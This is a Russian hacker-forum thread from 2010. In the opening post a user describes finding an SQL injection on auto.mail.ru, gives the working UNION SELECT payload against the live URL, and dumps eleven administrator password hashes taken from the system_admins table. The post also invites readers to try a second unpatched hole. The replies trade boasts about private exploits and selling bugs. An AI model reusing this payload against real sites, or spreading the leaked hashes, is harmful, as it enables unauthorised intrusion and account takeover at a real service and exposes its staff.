Авторские статьи SQL на Mail.Ru

Discussion in 'Статьи' started by Uex Urgent, 9 Jul 2010.

  1. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Всем доброго времени суток.

    Даже не знаю с чего начать, дык тема старая (в привате нигде ее не было, только в моей голове.).
    Статью (если ее так можно назвать) написать уговорил Kusto.

    Началось все как обычно у меня всегда все начинается, с поиска xss на mail.ru.
    Тыкал с кнопки туда сюда, чувствовал себя исследователем и искал. И на один мой тык по адресу
    PHP:
    http://auto.mail.ru/view.html?video_id='1
    мне вывалилась ошибка в sql.

    При помощи Уважаемого мною юзера Античата Nemaniak начали мы ее ковырять.
    Итого после долгого брута, sql ошибка вылилась в такой вот запрос
    PHP:
    http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+
    А мы увидели хеш пароля от почты
    PHP:
    aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf71:
    Я сперва подумал, что я добрался до базы админских почтовых ящиков и начал выводить все почтовые ящики перебирая лимит вывода +limit+0,1 (спасибо за подсказку Maniak), но скоро радость закончилась, так как вывести я смог только хеши паролей от 11 админских ящиков.

    Осозновая свою ничтожность, а так же осозновая что мне нафиг не нужны ни пароли, ни хеши от админских ящиков, я пришел на Античат и спросил местных знатоков, сколько же все таки может стоит данная уязвимость, если ее попытаться продать (учитывая что ни сама уязвимость, ни результат ее реализации мне нафиг не нужны, так как раскручивали только из чистого любопытства, было интересно в денежном эквиваленте - на сколько мы тогда наковыряли)

    Создал тему про стоимость sql на популярных почтовых серверах https://forum.antichat.ru/thread144589.html и получил ответ от Великого Блэксана (он действительно Великий, просто характер у него такой :) )
    и естественно будучи серой массой (не белой вороной как сейчас), а значит гамном, я далее тему развивать не стал и забыл про эту sql и ее последствия :) .

    На данный момент sql на мейле прикрыта (уже давно), про хеши я думать забыл (пока мне сегодня не напомнили).

    Выкладываю и сам sql запрос и выуженные через нее хеши админских паролей.

    PHP:
    http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+

    HTML:
    [email protected]:2e3b8f6d73eb89715150919027e5bf71:
    [email protected]:116791431a767fdf9321875186683b34:
    [email protected]:77ef5dc9edd2d4d764399237b3b59892:
    [email protected]:3e5555700638643f230b98a544f287ad:
    [email protected]:dffc7be887f428c3f18a60c8a7d85a14:
    [email protected]:b11871cb1f75cb38a8a401add015734b:
    [email protected]:72b4961d6ed4101abfd09321747d45ba:
    [email protected]:ab41f00cd7aa00e9b679a2d275
    [email protected]:a570bf4990157efc9118f7e38d2cdbbe:
    [email protected]:2e36b9903435d5da3815d2d298380f6b:
    [email protected]:38974963b8b8ea9b2d70c6115b091f64:
    Хеши наверное все еще живые, не брутил их. Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил (по ходу я был далеко не первым :) ) и забил на них.
    Потом была еще одна sql инъекция на mail.ru (на поддомене http://sysadmin.mail.ru/).
    Щас даже не помню где именно была дырка, но помню что были удачно выведены пароли от одной партнерки мейла (около 10 000 паролей) и так же удачно забыты вместе с самим sql запросом.
    Нигде, даже в логах не сохранились ни пароли, ни сам запрос, поэтому дерзайте, может не закрыли еще :) .


    С уважением, Satana-fu
     
    _________________________
    #1 Uex Urgent, 9 Jul 2010
    Last edited: 17 Jul 2010
    15 people like this.
  2. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Кстати- упросил его я написать статью, чтобы показать что и у крупных поэктов бывают ошибки- почему была раньше не выложенна статья- думаю понимате , думаю что в ближайшем будующем- будут еще темы, и очень хорошо что этот человек не занимается взломами на заказ- иначеб конкурентов у него небыло бы (я просто знаю его возможности)))

    P.S. Подтверждаю что данная уязвимость была на самом деле а не в воображении ТС ( поэтому и выкладываеться сейчас-(спустя пол года после ее прикрытия)- чтоб не нанести вред любимому почтовому сервису)
     
    #2 Kusto, 9 Jul 2010
    Last edited: 9 Jul 2010
    1 person likes this.
  3. Romik001

    Romik001 Member

    Joined:
    18 Jul 2009
    Messages:
    43
    Likes Received:
    8
    Reputations:
    10
    >>почему была раньше не выложенна статья- думаю понимате

    эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вообще то на приватах есть такой баг, я видал одну но это или другой не помню. Там тоже были проблемы хешами и поддомене мейла. Тока смысл?!
    Не думаю что по своим будем стрелят, все таки не красиво
     
    1 person likes this.
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Уважаемый,
    1. дата этой уязвимости 20.09.2009, да и вообще этой статьи :), почти год прошел с тех пор.
    2. Вряд ли вы дернете с мейл.ру sql уязвимостью столько мыл/акков, сколько вам угодно. Не пугайте народ.
    3. какая связь между авторегером и админскими хешами ? :)
    4. Гульчатай, откройте личико.
    5.
    Выделил, то на что Вам стоило обращать внимание.
     
    _________________________
    #5 Uex Urgent, 9 Jul 2010
    Last edited: 9 Jul 2010
    1 person likes this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам.

    PS. я против работе по снг, вот буржуев хот .... мне без разницы.
    PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)
     
  7. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Я им уже отправлял однажды.
    Спасибо не сказали, даже не ответили :mad:, поэтому я делал ради интереса и забывал. Бог свидетель, что на паблик выложил впервые, и то по просьбе. Про эту тоже не вспомнил бы, если не напомнили бы.
     
    _________________________
  8. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Будет Вам и про буржуйские))) но немного попозже))) (там горепрограммеров еще больше чем у нас)))

    вот этим ачат и отличается от квекве, что здесь ВСЕ понимают что те циферки после майла- не пароль а лиш хеш его, и автореггер хешами не замениш
    (иногда лучше промолчать, чем дать понять что не в теме-НО, вроде бабушки у подьезда говорили что....) Отличаеш глаголы- я уже СЛЫШАЛ и я НАШОЛ????
     
    #8 Kusto, 9 Jul 2010
    Last edited: 9 Jul 2010
  9. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    5 ветка была? Случаем не осталась структура? Интересует бд в которой лежала таблица system_admins
     
  10. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452

    ветка вроде как 4-я, потому что базы вроде как брутом брали,
    структура и название бд не сохранилось ни у меня, ни у Maniak. :mad:
     
    _________________________
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,167
    Likes Received:
    617
    Reputations:
    690
    а в приватах есть и актуальные скули почти всех почтовиков )
     
    _________________________
    2 people like this.
  12. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    ну в приватах я даже к своим собственным темам доступа не имею :D
     
    _________________________
    1 person likes this.
  13. Romik001

    Romik001 Member

    Joined:
    18 Jul 2009
    Messages:
    43
    Likes Received:
    8
    Reputations:
    10
    2. нефакт.
    3. никакой. я про хэши ничего не говорил.

    просто написал свое имхо. вы же не видели реально че выкладывали. да и вобще меня подобные темы как то мало интересуют.

    а ачат отличается от квекве тем что здесь есть люди которые умудряются толкать "суперприватные баги" за 1000$ о которых знает чуть ли не вся квекве школота. вот это хотел написать давно.

    и да:

    знаешь кусто как бы тебе объяснить? я и не хотел ДАТЬ ПОНЯТЬ что я в "теме". если бы хотел то сделал бы это. надеюсь тебе и таким как ты от этого станет легче на душе.

    не в обиду. никого не оскорблял и никому не затыкал рот заметьте.
     
    #13 Romik001, 9 Jul 2010
    Last edited: 9 Jul 2010
    2 people like this.
  14. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    если это раскрытие этой тайны, то Kusto тогда немного преувеличил. А так интересно было почитать.
     
    1 person likes this.
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Я вообще не понимаю людей, которые ходят по сайтам и пихают кавычки в запросы, а при виде ошибки раскручивают скули по стандартной схеме, чтобы потом выложить их на каком-нибудь форуме. Чем крупнее сайт с найденной узявимостью - тем глубже в приват это все выкладывается и тем выше ЧСВ у нашедшего эту уязвимость. Кто больше кавычек напихал в запросы - становится гуру для других.
    Так вот, к чему я это все написал... Romik001, если вся школота на квекве знает какие-то "приватные баги" и дро*ит на них, периодически меряясь, чей баг длиннее, то умные люди рубят на этих багах бабло...
     
    3 people like this.
  16. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    БрейнДед, зная Кусто, уверен, что он имел ввиду не эту статью годовой давности, которая потеряла свою актуальность и приватом как бэ особо и не является, а совсем другое, которое по сей день актуально и является приватом даже для привата.
    Имхо мое личное мнение.
     
    _________________________
    #16 Uex Urgent, 10 Jul 2010
    Last edited: 10 Jul 2010
    1 person likes this.
  17. DiamonD21

    DiamonD21 Member

    Joined:
    15 Feb 2010
    Messages:
    14
    Likes Received:
    14
    Reputations:
    0
    интересная статья...
     
  18. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    К ответу Satana-fu мне добавить нечего))), эта статья родилась на той волне, что не надо стебаться над новичками- иногда они находят интересные баги)), насчет того что я имел ввиду- со временем вы узнаете )),(это действительно приват даже для приватов :D ), просто бага рабочая и нам бы не хотелось чтоб вы с помощью нее опустили другой популярный сервис)))
     
  19. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    мы рады за вас,вы там действительно крутые кулхацкеры.
     
  20. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    +100500. к сожалению на ачате, до недавнего времени, это происходило сплошь и тядом.
    ждём с нетерпением. интересует не столь сам факт взлома, как история нахождения самой баги. интересно, как находят необычные и супер приватные уязвимости. каков ход мыслей и действий. играет ли роль везение. почему до сих пор специалисты по безопасности и другие хакеы не нашли эту багу. и т.д.
     
    2 people like this.